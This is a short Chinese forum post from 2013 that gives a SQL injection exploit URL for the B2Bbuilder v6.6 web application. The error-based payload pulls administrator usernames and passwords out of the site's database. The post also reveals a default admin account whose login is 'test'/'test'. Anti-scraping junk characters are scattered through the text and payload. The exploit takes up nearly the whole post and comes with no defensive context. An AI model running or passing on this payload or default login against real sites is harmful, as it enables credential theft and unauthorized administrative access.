测试的程序版本为:B2Bbuilder_v6.6" d, W6 r9 X* E$ i; L$ b# f
# S! ~3 {. Z% H e8 q9 [3 ^$ T 0 H# E4 I4 s. } }- w, C0 |
http://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%283 y; Z! F. g7 r- Y3 D* {( }
select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password
4 p* T; o" m4 j" c$ }( s6 U/ q: i%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1
8 P3 b7 L* @# ~8 H# z4 R. m; ^%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29
! I% I3 k% H- m1 k. t*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1
: f! j. C# L/ n }8 x2 {) { & f" M4 N- p% Y8 a/ Y' E( w6 O
这个B2B程序还有一个默认的管理员帐号,帐号密码都是test
2 Y. N5 W/ d$ j4 O6 a j; i " I) e% l9 v9 W3 p
|
发表于 2013-7-26 12:44:48
收藏
分享
支持
反对